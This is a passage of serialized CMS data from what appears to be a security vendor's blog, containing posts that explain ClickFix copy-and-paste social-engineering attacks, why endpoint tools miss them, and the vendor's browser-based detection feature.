organizations are leaving themselves relying on a single line of defense — if the attack isn’t detected and blocked by EDR, it isn’t spotted at all. ",{"data":30726,"content":30727,"nodeType":905},{},[],{"data":30729,"content":30730,"nodeType":909},{},[30731],{"data":30732,"marks":30733,"value":30735,"nodeType":883},{},[30734],{"type":916},"Don’t gamble on a single point of failure ",{"data":30737,"content":30738,"nodeType":879},{},[30739,30743,30752],{"data":30740,"marks":30741,"value":30742,"nodeType":883},{},[],"Push Security’s latest feature, ",{"data":30744,"content":30746,"nodeType":940},{"uri":30745},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fintroducing-malicious-copy-paste-detection?utm_source=thehackernews&utm_medium=sponsored-content&utm_term=article",[30747],{"data":30748,"marks":30749,"value":30751,"nodeType":883},{},[30750],{"type":948},"malicious copy and paste detection",{"data":30753,"marks":30754,"value":30755,"nodeType":883},{},[],", tackles ClickFix-style attacks at the earliest opportunity through browser-based detection and blocking. This is a universally effective control that works regardless of the lure delivery channel, page style and structure, or the specifics of the malware type and execution.",{"data":30757,"content":30758,"nodeType":879},{},[30759],{"data":30760,"marks":30761,"value":30762,"nodeType":883},{},[],"Unlike heavy-handed DLP solutions that block copy-paste altogether, Push protects your employees without disrupting their user experience or hampering productivity.",{"data":30764,"content":30765,"nodeType":879},{},[30766],{"data":30767,"marks":30768,"value":30769,"nodeType":883},{},[],"By adding a new layer of protection in the browser, security teams can reduce the strain on their EDR and reduce the risk of host-based controls being bypassed through misconfiguration or attacker innovation. ",{"data":30771,"content":30775,"nodeType":971},{"target":30772},{"sys":30773},{"id":30774,"type":976,"linkType":977},"sALkMt8UbTZ2f34hKvGLj",[],{"data":30777,"content":30778,"nodeType":905},{},[],{"data":30780,"content":30781,"nodeType":909},{},[30782],{"data":30783,"marks":30784,"value":18990,"nodeType":883},{},[30785],{"type":916},{"data":30787,"content":30788,"nodeType":879},{},[30789,30793,30802],{"data":30790,"marks":30791,"value":30792,"nodeType":883},{},[],"If you want to learn more about ClickFix attacks and how they’re evolving, ",{"data":30794,"content":30796,"nodeType":940},{"uri":30795},"https:\u002F\u002Fpushsecurity.com\u002Fresources\u002Fclickfix",[30797],{"data":30798,"marks":30799,"value":30801,"nodeType":883},{},[30800],{"type":948},"check out our latest webinar (now available on-demand!)",{"data":30803,"marks":30804,"value":30805,"nodeType":883},{},[]," where we dive into real-world ClickFix examples and demonstrate how ClickFix sites work under the hood. ",{"data":30807,"content":30808,"nodeType":879},{},[30809,30812,30819,30822,30829],{"data":30810,"marks":30811,"value":16267,"nodeType":883},{},[],{"data":30813,"content":30814,"nodeType":940},{"uri":10222},[30815],{"data":30816,"marks":30817,"value":10228,"nodeType":883},{},[30818],{"type":948},{"data":30820,"marks":30821,"value":26256,"nodeType":883},{},[],{"data":30823,"content":30824,"nodeType":940},{"uri":4772},[30825],{"data":30826,"marks":30827,"value":1751,"nodeType":883},{},[30828],{"type":948},{"data":30830,"marks":30831,"value":1350,"nodeType":883},{},[],{"data":30833,"content":30836,"nodeType":971},{"target":30834},{"sys":30835},{"id":30391,"type":976,"linkType":977},[],{"data":30838,"content":30839,"nodeType":879},{},[30840],{"data":30841,"marks":30842,"value":21,"nodeType":883},{},[],"The most advanced ClickFix yet?","Breaking down the most sophisticated ClickFix page we’ve seen in the wild — and what it tells us about the future of malicious copy-and-paste attacks. ","2025-11-06T00:00:00.000Z","the-most-advanced-clickfix-yet",{"items":30848},[30849,30851],{"sys":30850,"name":343},{"id":3276},{"sys":30852,"name":3273},{"id":3272},{"items":30854},[30855],{"fullName":866,"firstName":867,"jobTitle":868,"profilePicture":30856},{"url":872},{"__typename":1967,"sys":30858,"content":30859,"title":27540,"synopsis":31479,"hashTags":59,"publishedDate":31480,"slug":27541,"tagsCollection":31481,"authorsCollection":31487},{"id":27246},{"json":30860},{"data":30861,"content":30862,"nodeType":875},{},[30863,30908,30965,30980,30985,30992,30995,31003,31010,31017,31024,31044,31051,31057,31075,31081,31084,31092,31099,31107,31127,31134,31141,31148,31156,31163,31170,31176,31183,31216,31222,31230,31249,31256,31279,31286,31293,31299,31306,31309,31317,31331,31351,31358,31365,31372,31377,31385,31404,31407,31414,31421,31428,31435,31442,31468,31473],{"data":30864,"content":30865,"nodeType":879},{},[30866,30870,30878,30882,30891,30895,30904],{"data":30867,"marks":30868,"value":30869,"nodeType":883},{},[],"One of the biggest security trends in the past year has been the emergence of the attack technique known as ",{"data":30871,"content":30873,"nodeType":940},{"uri":30872},"https:\u002F\u002Fwww.microsoft.com\u002Fen-us\u002Fsecurity\u002Fblog\u002F2025\u002F08\u002F21\u002Fthink-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique\u002F",[30874],{"data":30875,"marks":30876,"value":316,"nodeType":883},{},[30877],{"type":948},{"data":30879,"marks":30880,"value":30881,"nodeType":883},{},[],". Various reports indicate that ClickFix is fast becoming one of the most prevalent attack techniques this year, with ",{"data":30883,"content":30885,"nodeType":940},{"uri":30884},"https:\u002F\u002Fwww.scworld.com\u002Fnews\u002Fclickfix-phishing-links-increased-nearly-400-in-12-months-report-says",[30886],{"data":30887,"marks":30888,"value":30890,"nodeType":883},{},[30889],{"type":948},"one study",{"data":30892,"marks":30893,"value":30894,"nodeType":883},{},[]," reporting that email-based ClickFix attacks have increased by 400% YOY, and ",{"data":30896,"content":30898,"nodeType":940},{"uri":30897},"https:\u002F\u002Fweb-assets.esetstatic.com\u002Fwls\u002Fen\u002Fpapers\u002Fthreat-reports\u002Feset-threat-report-h12025.pdf",[30899],{"data":30900,"marks":30901,"value":30903,"nodeType":883},{},[30902],{"type":948},"another",{"data":30905,"marks":30906,"value":30907,"nodeType":883},{},[]," highlighting a 517% increase in the past 6 months. ",{"data":30909,"content":30910,"nodeType":879},{},[30911,30915,30924,30927,30936,30939,30948,30952,30961],{"data":30912,"marks":30913,"value":30914,"nodeType":883},{},[],"ClickFix is known to be regularly used by the Interlock ransomware group and other prolific threat actors. A number of recent public data breaches have been linked to ClickFix attacks as the attack vector, such as ",{"data":30916,"content":30918,"nodeType":940},{"uri":30917},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fkettering-health-confirms-interlock-ransomware-behind-cyberattack\u002F",[30919],{"data":30920,"marks":30921,"value":30923,"nodeType":883},{},[30922],{"type":948},"Kettering Health",{"data":30925,"marks":30926,"value":2524,"nodeType":883},{},[],{"data":30928,"content":30930,"nodeType":940},{"uri":30929},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Finterlock-ransomware-claims-davita-attack-leaks-stolen-data\u002F",[30931],{"data":30932,"marks":30933,"value":30935,"nodeType":883},{},[30934],{"type":948},"DaVita",{"data":30937,"marks":30938,"value":2524,"nodeType":883},{},[],{"data":30940,"content":30942,"nodeType":940},{"uri":30941},"https:\u002F\u002Fwww.infosecurity-magazine.com\u002Fnews\u002Fst-paul-mayor-interlock-data-leak\u002F",[30943],{"data":30944,"marks":30945,"value":30947,"nodeType":883},{},[30946],{"type":948},"City of St. Paul, Minnesota",{"data":30949,"marks":30950,"value":30951,"nodeType":883},{},[],", and the ",{"data":30953,"content":30955,"nodeType":940},{"uri":30954},"https:\u002F\u002Fwww.blackfog.com\u002Ftexas-tech-cyberattack-1-4m-records-compromised\u002F",[30956],{"data":30957,"marks":30958,"value":30960,"nodeType":883},{},[30959],{"type":948},"Texas Tech University Health Sciences Centers",{"data":30962,"marks":30963,"value":30964,"nodeType":883},{},[]," (with many more breaches likely to involve ClickFix where the attack vector wasn’t known or disclosed).",{"data":30966,"content":30967,"nodeType":879},{},[30968,30972,30976],{"data":30969,"marks":30970,"value":30971,"nodeType":883},{},[],"Push’s latest feature, ",{"data":30973,"marks":30974,"value":30751,"nodeType":883},{},[30975],{"type":916},{"data":30977,"marks":30978,"value":30979,"nodeType":883},{},[],", tackles ClickFix-style attacks at the earliest opportunity through browser-based detection, with a universally effective control that works regardless of the lure delivery channel, or page style and structure. ",{"data":30981,"content":30984,"nodeType":971},{"target":30982},{"sys":30983},{"id":30774,"type":976,"linkType":977},[],{"data":30986,"content":30987,"nodeType":879},{},[30988],{"data":30989,"marks":30990,"value":30991,"nodeType":883},{},[],"Before we get into the specifics of the feature, let’s take a look at what ClickFix is and why it poses a detection and response challenge to security teams.",{"data":30993,"content":30994,"nodeType":905},{},[],{"data":30996,"content":30997,"nodeType":909},{},[30998],{"data":30999,"marks":31000,"value":31002,"nodeType":883},{},[31001],{"type":916},"ClickFix 101",{"data":31004,"content":31005,"nodeType":879},{},[31006],{"data":31007,"marks":31008,"value":31009,"nodeType":883},{},[],"ClickFix attacks prompt the user to solve some kind of problem or challenge in the browser — most commonly a CAPTCHA, but also things like fixing an error on a webpage. The name is a little misleading though — the key factor in the attack is that they trick users into running malicious commands on their device by copying malicious code from the page clipboard and running it locally. (For simplicity we’ll keep calling it ClickFix, but we’re not happy about it.)",{"data":31011,"content":31012,"nodeType":879},{},[31013],{"data":31014,"marks":31015,"value":31016,"nodeType":883},{},[],"The copy action is either performed manually by the user, or automatically by the page. Manual copies typically include additional social engineering to lure the victim into hitting CTRL+C, while automatic copies are performed using JavaScript running on the page. Most ClickFix pages we've seen are automatic copies, which makes sense — fewer steps means the user is more likely to follow the instruction.",{"data":31018,"content":31019,"nodeType":879},{},[31020],{"data":31021,"marks":31022,"value":31023,"nodeType":883},{},[],"Most commonly, these attacks are used to deliver remote access software or infostealer malware using stolen session cookies and credentials to facilitate attacks on business apps and services. From there, the attacker simply dumps the data and holds the victim to ransom for its deletion — often dropping ransomware afterwards for double the extortion. ",{"data":31025,"content":31026,"nodeType":879},{},[31027,31031,31040],{"data":31028,"marks":31029,"value":31030,"nodeType":883},{},[],"The attack gives the victim instructions that involve clicking prompts and copying, pasting, and running commands directly in the Windows Run dialog box, Terminal, or PowerShell in order to “fix” the fake problem that they’re experiencing. Variants such as ",{"data":31032,"content":31034,"nodeType":940},{"uri":31033},"https:\u002F\u002Fmrd0x.com\u002Ffilefix-clickfix-alternative\u002F",[31035],{"data":31036,"marks":31037,"value":31039,"nodeType":883},{},[31038],{"type":948},"FileFix",{"data":31041,"marks":31042,"value":31043,"nodeType":883},{},[]," have also emerged which instead use the File Explorer Address Bar to execute OS commands.",{"data":31045,"content":31046,"nodeType":879},{},[31047],{"data":31048,"marks":31049,"value":31050,"nodeType":883},{},[],"Links to malicious ClickFix pages are distributed over various delivery channels, with attacks shifting from traditional email-based delivery to social media, instant messaging apps, malicious ads in places like Google Search, and using in-app notifications and messages across numerous SaaS services. ",{"data":31052,"content":31056,"nodeType":971},{"target":31053},{"sys":31054},{"id":31055,"type":976,"linkType":977},"1I9ERDY2tuspw5zVMV5DbY",[],{"data":31058,"content":31059,"nodeType":879},{},[31060,31064,31071],{"data":31061,"marks":31062,"value":31063,"nodeType":883},{},[],"ClickFix comes in a variety of lures, including impersonating CAPTCHA, Cloudflare Turnstile, simulating an error loading a webpage, and many more. They have also been observed targeting a ",{"data":31065,"content":31066,"nodeType":940},{"uri":30527},[31067],{"data":31068,"marks":31069,"value":31070,"nodeType":883},{},[],"wide range of services",{"data":31072,"marks":31073,"value":31074,"nodeType":883},{},[]," to execute code. ",{"data":31076,"content":31080,"nodeType":971},{"target":31077},{"sys":31078},{"id":31079,"type":976,"linkType":977},"1SG52ta1hcBZ3gYDsSJvsm",[],{"data":31082,"content":31083,"nodeType":905},{},[],{"data":31085,"content":31086,"nodeType":909},{},[31087],{"data":31088,"marks":31089,"value":31091,"nodeType":883},{},[31090],{"type":916},"Why are ClickFix attacks so effective?",{"data":31093,"content":31094,"nodeType":879},{},[31095],{"data":31096,"marks":31097,"value":31098,"nodeType":883},{},[],"To understand the effectiveness of ClickFix-style attacks, we need to look more closely at the mechanisms that security teams have at their disposal to counter these attacks. ",{"data":31100,"content":31101,"nodeType":1036},{},[31102],{"data":31103,"marks":31104,"value":31106,"nodeType":883},{},[31105],{"type":916},"Detection challenges during delivery",{"data":31108,"content":31109,"nodeType":879},{},[31110,31114,31123],{"data":31111,"marks":31112,"value":31113,"nodeType":883},{},[],"We’ve written extensively about ",{"data":31115,"content":31117,"nodeType":940},{"uri":31116},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fphishing-detection-evasion-launch\u002F",[31118],{"data":31119,"marks":31120,"value":31122,"nodeType":883},{},[31121],{"type":948},"the evolution in phishing techniques and tooling",{"data":31124,"marks":31125,"value":31126,"nodeType":883},{},[],", and what this means for the reliability of traditional detections at the network and endpoint layer. ",{"data":31128,"content":31129,"nodeType":879},{},[31130],{"data":31131,"marks":31132,"value":31133,"nodeType":883},{},[],"The latest generation of phishing pages are dynamically obfuscating the code that loads the web page, implementing custom bot protection (e.g. CAPTCHA or Cloudflare Turnstile), using runtime anti-analysis features, and using legitimate SaaS and cloud services to host and deliver phishing links to cover their tracks.",{"data":31135,"content":31136,"nodeType":879},{},[31137],{"data":31138,"marks":31139,"value":31140,"nodeType":883},{},[],"This means that traditional anti-phishing tools at the email and network layer are struggling to keep up, with many attacks evading email-based detections (or bypassing email altogether). At the same time, proxy-based solutions now see a garbled mess of JavaScript code without the necessary context of what is actually happening in the browser to be able to piece it together effectively. Even if they don’t realize it, this means many organizations are now relying solely on blocking known-bad sites and hosts — a wildly ineffective solution in 2025 with the rate that attackers refresh and rotate their phishing infrastructure. ",{"data":31142,"content":31143,"nodeType":879},{},[31144],{"data":31145,"marks":31146,"value":31147,"nodeType":883},{},[],"In addition to the fact that ClickFix page styles and content can vary significantly, this means that detecting ClickFix delivery using traditional tooling is highly unreliable. ",{"data":31149,"content":31150,"nodeType":1036},{},[31151],{"data":31152,"marks":31153,"value":31155,"nodeType":883},{},[31154],{"type":916},"Detection challenges during execution",{"data":31157,"content":31158,"nodeType":879},{},[31159],{"data":31160,"marks":31161,"value":31162,"nodeType":883},{},[],"Most of the detection heavy lifting is being done at the endpoint, looking for user-level code execution and malware running on a device. ",{"data":31164,"content":31165,"nodeType":879},{},[31166],{"data":31167,"marks":31168,"value":31169,"nodeType":883},{},[],"However, the number of ClickFix-related headlines in the news would indicate that endpoint controls are being routinely bypassed, or perhaps evaded altogether by targeting personal or BYOD devices. ",{"data":31171,"content":31175,"nodeType":971},{"target":31172},{"sys":31173},{"id":31174,"type":976,"linkType":977},"pocty4OhER5EXr8BDwdzo",[],{"data":31177,"content":31178,"nodeType":879},{},[31179],{"data":31180,"marks":31181,"value":31182,"nodeType":883},{},[],"There are a number of reasons that endpoint-level ClickFix detections can be bypassed:",{"data":31184,"content":31185,"nodeType":1531},{},[31186,31196,31206],{"data":31187,"content":31188,"nodeType":1535},{},[31189],{"data":31190,"content":31191,"nodeType":879},{},[31192],{"data":31193,"marks":31194,"value":31195,"nodeType":883},{},[],"The step of downloading a file from the web is bypassed altogether. In a ClickFix\u002FFileFix attack, the initial “dropper” is essentially a command string provided by the attacker and executed by legitimate system utilities. There is often no new executable file written to disk when the user runs the command. The final payload may be loaded directly into memory or injected into trusted programs (using living-off-the-land techniques). Without a file to quarantine, there's no \"Mark of the Web\" to make it appear suspicious. ",{"data":31197,"content":31198,"nodeType":1535},{},[31199],{"data":31200,"content":31201,"nodeType":879},{},[31202],{"data":31203,"marks":31204,"value":31205,"nodeType":883},{},[],"From the EDR’s point of view, a trusted parent process is launching a script – which might not immediately be judged as malicious, especially if the command is obfuscated or uses allowed system functions. Since the action is initiated by the user, it blends in with normal user-driven administration tasks. ",{"data":31207,"content":31208,"nodeType":1535},{},[31209],{"data":31210,"content":31211,"nodeType":879},{},[31212],{"data":31213,"marks":31214,"value":31215,"nodeType":883},{},[],"The PowerShell commands themselves might be obfuscated or broken into stages to avoid easy detection by heuristic rules. EDR telemetry might record that a PowerShell process ran, but without a known bad signature or a clear policy violation, it may not flag it immediately. ",{"data":31217,"content":31221,"nodeType":971},{"target":31218},{"sys":31219},{"id":31220,"type":976,"linkType":977},"6djGsqBFTHlLLITpTK7IMk",[],{"data":31223,"content":31224,"nodeType":1036},{},[31225],{"data":31226,"marks":31227,"value":31229,"nodeType":883},{},[31228],{"type":916},"Accessing ClickFix-style capabilities is easier than ever",{"data":31231,"content":31232,"nodeType":879},{},[31233,31237,31245],{"data":31234,"marks":31235,"value":31236,"nodeType":883},{},[],"This capability is increasingly available to all levels of threat actor, with ",{"data":31238,"content":31239,"nodeType":940},{"uri":30872},[31240],{"data":31241,"marks":31242,"value":31244,"nodeType":883},{},[31243],{"type":948},"off-the-shelf options available",{"data":31246,"marks":31247,"value":31248,"nodeType":883},{},[]," in the form of ClickFix builders (also called “Win + R”) on popular hacker forums since late 2024. ",{"data":31250,"content":31251,"nodeType":879},{},[31252],{"data":31253,"marks":31254,"value":31255,"nodeType":883},{},[],"Attackers are bundling ClickFix builders into their existing kits to:",{"data":31257,"content":31258,"nodeType":1531},{},[31259,31269],{"data":31260,"content":31261,"nodeType":1535},{},[31262],{"data":31263,"content":31264,"nodeType":879},{},[31265],{"data":31266,"marks":31267,"value":31268,"nodeType":883},{},[],"Use pre-canned landing pages with various lures including Cloudflare. ",{"data":31270,"content":31271,"nodeType":1535},{},[31272],{"data":31273,"content":31274,"nodeType":879},{},[31275],{"data":31276,"marks":31277,"value":31278,"nodeType":883},{},[],"Offer construction of malicious commands that users will paste into the Windows Run dialog. ",{"data":31280,"content":31281,"nodeType":879},{},[31282],{"data":31283,"marks":31284,"value":31285,"nodeType":883},{},[],"These kits claim to guarantee antivirus and web protection bypass (some even promise that they can bypass Microsoft Defender SmartScreen), as well as payload persistence. The cost of subscription to such a service might be between US$200 to US$1,500 per month. ",{"data":31287,"content":31288,"nodeType":879},{},[31289],{"data":31290,"marks":31291,"value":31292,"nodeType":883},{},[],"In short, these capabilities are increasingly accessible to the general population of hackers, and it is increasingly in the interests of malware developers to offer premium hacker tools designed to bypass current detections. ",{"data":31294,"content":31298,"nodeType":971},{"target":31295},{"sys":31296},{"id":31297,"type":976,"linkType":977},"5hkRsOBZCOABAShCo8RjJg",[],{"data":31300,"content":31301,"nodeType":879},{},[31302],{"data":31303,"marks":31304,"value":31305,"nodeType":883},{},[],"In any case, relying on just-in-time detection at the point of execution is increasingly unreliable and will always be at the mercy of the cat-and-mouse game between attackers and defenders. Organizations employing custom detections looking for specific malware behavior are likely to have better success than those relying on out-of-the-box EDR configs, but this requires continual maintenance to be effective. ",{"data":31307,"content":31308,"nodeType":905},{},[],{"data":31310,"content":31311,"nodeType":909},{},[31312],{"data":31313,"marks":31314,"value":31316,"nodeType":883},{},[31315],{"type":916},"Solving ClickFix detection in the browser with Push",{"data":31318,"content":31319,"nodeType":879},{},[31320,31323,31327],{"data":31321,"marks":31322,"value":30971,"nodeType":883},{},[],{"data":31324,"marks":31325,"value":30751,"nodeType":883},{},[31326],{"type":916},{"data":31328,"marks":31329,"value":31330,"nodeType":883},{},[],", tackles ClickFix-style attacks at the earliest opportunity through browser-based detection and blocking, with a universally effective control that works regardless of the lure delivery channel, page style and structure, or the specifics of the malware type and execution.",{"data":31332,"content":31333,"nodeType":879},{},[31334,31338,31347],{"data":31335,"marks":31336,"value":31337,"nodeType":883},{},[],"A key part of our design philosophy is to find ways to universally detect attacker TTPs by analyzing generic attacker actions that can’t be avoided by the attacker. One of our best prior examples of this is with our ",{"data":31339,"content":31341,"nodeType":940},{"uri":31340},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fintroducing-sso-password-protection\u002F",[31342],{"data":31343,"marks":31344,"value":31346,"nodeType":883},{},[31345],{"type":948},"password protection feature",{"data":31348,"marks":31349,"value":31350,"nodeType":883},{},[],", which detects and blocks phishing attacks by triggering when a user attempts to enter a password that belongs to one domain on a different domain. ",{"data":31352,"content":31353,"nodeType":879},{},[31354],{"data":31355,"marks":31356,"value":31357,"nodeType":883},{},[],"In the case of ClickFix, every attack involves copying a malicious script from a page — a behavior the attacker can’t avoid.",{"data":31359,"content":31360,"nodeType":879},{},[31361],{"data":31362,"marks":31363,"value":31364,"nodeType":883},{},[],"Unlike heavy-handed DLP solutions that block copy-paste altogether, Push protects your employees without disrupting their user experience or hampering productivity. ",{"data":31366,"content":31367,"nodeType":879},{},[31368],{"data":31369,"marks":31370,"value":31371,"nodeType":883},{},[],"Check out the video below to see Push in action. ",{"data":31373,"content":31376,"nodeType":971},{"target":31374},{"sys":31375},{"id":30774,"type":976,"linkType":977},[],{"data":31378,"content":31379,"nodeType":1036},{},[31380],{"data":31381,"marks":31382,"value":31384,"nodeType":883},{},[31383],{"type":916},"Enable ClickFix detection in just a few clicks",{"data":31386,"content":31387,"nodeType":879},{},[31388,31392,31400],{"data":31389,"marks":31390,"value":31391,"nodeType":883},{},[],"Check out the ",{"data":31393,"content":31395,"nodeType":940},{"uri":31394},"https:\u002F\u002Fpushsecurity.com\u002Fhelp\u002F10141\u002F#start",[31396],{"data":31397,"marks":31398,"value":31399,"nodeType":883},{},[],"help article",{"data":31401,"marks":31402,"value":31403,"nodeType":883},{},[]," for step-by-step instructions on how to enable the control. ",{"data":31405,"content":31406,"nodeType":905},{},[],{"data":31408,"content":31409,"nodeType":909},{},[31410],{"data":31411,"marks":31412,"value":12611,"nodeType":883},{},[31413],{"type":916},{"data":31415,"content":31416,"nodeType":879},{},[31417],{"data":31418,"marks":31419,"value":31420,"nodeType":883},{},[],"Push provides last mile protection against browser-based attacks, adding a net-new layer of technical protection in the browser. ",{"data":31422,"content":31423,"nodeType":879},{},[31424],{"data":31425,"marks":31426,"value":31427,"nodeType":883},{},[],"Right now, most organizations are left relying on user awareness. Faced with increasingly novel attack types, encountered all over the internet, users are being caught unawares — further reducing the efficacy of an already fragile control. ",{"data":31429,"content":31430,"nodeType":879},{},[31431],{"data":31432,"marks":31433,"value":31434,"nodeType":883},{},[],"By seeing what the user sees in the browser, as they see it, as well as monitoring for risky behaviors, Push provides a strong backstop against an ever-expanding landscape of browser-based exploits. ",{"data":31436,"content":31437,"nodeType":879},{},[31438],{"data":31439,"marks":31440,"value":31441,"nodeType":883},{},[],"Push’s browser-based security platform provides comprehensive identity attack detection and response capabilities against techniques like AiTM phishing, credential stuffing, ClickFixing, malicious browser extensions, and session hijacking using stolen session tokens. You can also use Push to find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, risky OAuth integrations, and more to harden your identity attack surface.",{"data":31443,"content":31444,"nodeType":879},{},[31445,31448,31455,31458,31465],{"data":31446,"marks":31447,"value":16267,"nodeType":883},{},[],{"data":31449,"content":31450,"nodeType":940},{"uri":10222},[31451],{"data":31452,"marks":31453,"value":10228,"nodeType":883},{},[31454],{"type":948},{"data":31456,"marks":31457,"value":26256,"nodeType":883},{},[],{"data":31459,"content":31460,"nodeType":940},{"uri":4772},[31461],{"data":31462,"marks":31463,"value":1751,"nodeType":883},{},[31464],{"type":948},{"data":31466,"marks":31467,"value":1350,"nodeType":883},{},[],{"data":31469,"content":31472,"nodeType":971},{"target":31470},{"sys":31471},{"id":31220,"type":976,"linkType":977},[],{"data":31474,"content":31475,"nodeType":879},{},[31476],{"data":31477,"marks":31478,"value":21,"nodeType":883},{},[],"Push now detects malware delivery in the browser, supporting a layered defense against endpoint attacks. ","2025-10-09T00:00:00.000Z",{"items":31482},[31483,31485],{"sys":31484,"name":343},{"id":3276},{"sys":31486,"name":3273},{"id":3272},{"items":31488},[31489],{"fullName":866,"firstName":867,"jobTitle":868,"profilePicture":31490},{"url":872},"blog\u002Finstallfix",{"json":31493},{"data":31494,"content":31495,"nodeType":875},{},[31496],{"data":31497,"content":31498,"nodeType":879},{},[31499],{"data":31500,"marks":31501,"value":31502,"nodeType":883},{},[],"Attackers are distributing almost identical cloned sites of popular developer tools like Claude Code with fake install instructions via malicious search engine ads — tricking victims into installing infostealer malware instead. ",{"id":9708,"publishedAt":31504},"2026-08-12T13:28:02.181Z",{"items":31506},[31507,31509],{"sys":31508,"name":3273},{"id":3272},{"sys":31510,"name":343},{"id":3276},{"items":31512},[31513,31515,31517,31519,31521,31523,31525,31527,31529,31531,31533,31535],{"sys":31514,"name":280,"slug":281,"tier":31},{"id":277},{"sys":31516,"name":521,"slug":522,"tier":31},{"id":518},{"sys":31518,"name":343,"slug":344,"tier":31},{"id":340},{"sys":31520,"name":641,"slug":642,"tier":31},{"id":638},{"sys":31522,"name":316,"slug":317,"tier":45},{"id":313},{"sys":31524,"name":442,"slug":443,"tier":45},{"id":439},{"sys":31526,"name":607,"slug":608,"tier":45},{"id":604},{"sys":31528,"name":450,"slug":451,"tier":45},{"id":447},{"sys":31530,"name":424,"slug":425,"tier":45},{"id":421},{"sys":31532,"name":433,"slug":434,"tier":45},{"id":430},{"sys":31534,"name":477,"slug":478,"tier":45},{"id":474},{"sys":31536,"name":244,"slug":245,"tier":45},{"id":241},"bhqwswrCKY8XUOeyfqgrT_bbdwMvlm25CtqySFe4ADE",{"id":31539,"title":30843,"authorsCollection":31540,"content":31545,"extension":228,"faqItemsCollection":32116,"faqTitle":59,"featured":6,"hashTags":59,"meta":32118,"metaTitle":32119,"ogImage":59,"postType":8981,"publishedDate":30845,"relatedBlogPostsCollection":32120,"slug":30846,"stem":33981,"subtitle":59,"summary":33982,"synopsis":30844,"sys":33992,"tagsCollection":33994,"topicsCollection":34000,"__hash__":34028},"blog\u002Fblog\u002Fthe-most-advanced-clickfix-yet.json",{"items":31541},[31542],{"fullName":866,"firstName":867,"jobTitle":868,"socialLinks":31543,"profilePicture":31544},[870],{"url":872},{"json":31546,"links":32042},{"data":31547,"content":31548,"nodeType":875},{},[31549,31555,31561,31571,31576,31582,31585,31592,31598,31603,31616,31622,31643,31649,31654,31657,31664,31690,31695,31711,31716,31732,31738,31743,31746,31753,31759,31775,31781,31797,31803,31808,31811,31818,31824,31854,31860,31866,31906,31921,31930,31936,31939,31946,31962,31968,31974,31979,31982,31989,32005,32031,32036],{"data":31550,"content":31551,"nodeType":879},{},[31552],{"data":31553,"marks":31554,"value":30277,"nodeType":883},{},[],{"data":31556,"content":31557,"nodeType":879},{},[31558],{"data":31559,"marks":31560,"value":30284,"nodeType":883},{},[],{"data":31562,"content":31563,"nodeType":879},{},[31564,31567],{"data":31565,"marks":31566,"value":30291,"nodeType":883},{},[],{"data":31568,"marks":31569,"value":30296,"nodeType":883},{},[31570],{"type":916},{"data":31572,"content":31575,"nodeType":971},{"target":31573},{"sys":31574},{"id":30301,"type":976,"linkType":977},[],{"data":31577,"content":31578,"nodeType":879},{},[31579],{"data":31580,"marks":31581,"value":30309,"nodeType":883},{},[],{"data":31583,"content":31584,"nodeType":905},{},[],{"data":31586,"content":31587,"nodeType":909},{},[31588],{"data":31589,"marks":31590,"value":30320,"nodeType":883},{},[31591],{"type":916},{"data":31593,"content":31594,"nodeType":879},{},[31595],{"data":31596,"marks":31597,"value":30327,"nodeType":883},{},[],{"data":31599,"content":31602,"nodeType":971},{"target":31600},{"sys":31601},{"id":30332,"type":976,"linkType":977},[],{"data":31604,"content":31605,"nodeType":879},{},[31606,31609,31613],{"data":31607,"marks":31608,"value":30340,"nodeType":883},{},[],{"data":31610,"marks":31611,"value":30345,"nodeType":883},{},[31612],{"type":916},{"data":31614,"marks":31615,"value":30349,"nodeType":883},{},[],{"data":31617,"content":31618,"nodeType":879},{},[31619],{"data":31620,"marks":31621,"value":30356,"nodeType":883},{},[],{"data":31623,"content":31624,"nodeType":1531},{},[31625,31634],{"data":31626,"content":31627,"nodeType":1535},{},[31628],{"data":31629,"content":31630,"nodeType":879},{},[31631],{"data":31632,"marks":31633,"value":30369,"nodeType":883},{},[],{"data":31635,"content":31636,"nodeType":1535},{},[31637],{"data":31638,"content":31639,"nodeType":879},{},[31640],{"data":31641,"marks":31642,"value":30379,"nodeType":883},{},[],{"data":31644,"content":31645,"nodeType":879},{},[31646],{"data":31647,"marks":31648,"value":30386,"nodeType":883},{},[],{"data":31650,"content":31653,"nodeType":971},{"target":31651},{"sys":31652},{"id":30391,"type":976,"linkType":977},[],{"data":31655,"content":31656,"nodeType":905},{},[],{"data":31658,"content":31659,"nodeType":909},{},[31660],{"data":31661,"marks":31662,"value":30403,"nodeType":883},{},[31663],{"type":916},{"data":31665,"content":31666,"nodeType":879},{},[31667,31670,31677,31680,31687],{"data":31668,"marks":31669,"value":30410,"nodeType":883},{},[],{"data":31671,"content":31672,"nodeType":940},{"uri":30413},[31673],{"data":31674,"marks":31675,"value":30419,"nodeType":883},{},[31676],{"type":948},{"data":31678,"marks":31679,"value":30423,"nodeType":883},{},[],{"data":31681,"content":31682,"nodeType":940},{"uri":30426},[31683],{"data":31684,"marks":31685,"value":30432,"nodeType":883},{},[31686],{"type":948},{"data":31688,"marks":31689,"value":30436,"nodeType":883},{},[],{"data":31691,"content":31694,"nodeType":971},{"target":31692},{"sys":31693},{"id":30441,"type":976,"linkType":977},[],{"data":31696,"content":31697,"nodeType":879},{},[31698,31701,31708],{"data":31699,"marks":31700,"value":30449,"nodeType":883},{},[],{"data":31702,"content":31703,"nodeType":940},{"uri":30452},[31704],{"data":31705,"marks":31706,"value":30458,"nodeType":883},{},[31707],{"type":948},{"data":31709,"marks":31710,"value":3386,"nodeType":883},{},[],{"data":31712,"content":31715,"nodeType":971},{"target":31713},{"sys":31714},{"id":30466,"type":976,"linkType":977},[],{"data":31717,"content":31718,"nodeType":879},{},[31719,31722,31729],{"data":31720,"marks":31721,"value":30474,"nodeType":883},{},[],{"data":31723,"content":31724,"nodeType":940},{"uri":30477},[31725],{"data":31726,"marks":31727,"value":13764,"nodeType":883},{},[31728],{"type":948},{"data":31730,"marks":31731,"value":30486,"nodeType":883},{},[],{"data":31733,"content":31734,"nodeType":879},{},[31735],{"data":31736,"marks":31737,"value":30493,"nodeType":883},{},[],{"data":31739,"content":31742,"nodeType":971},{"target":31740},{"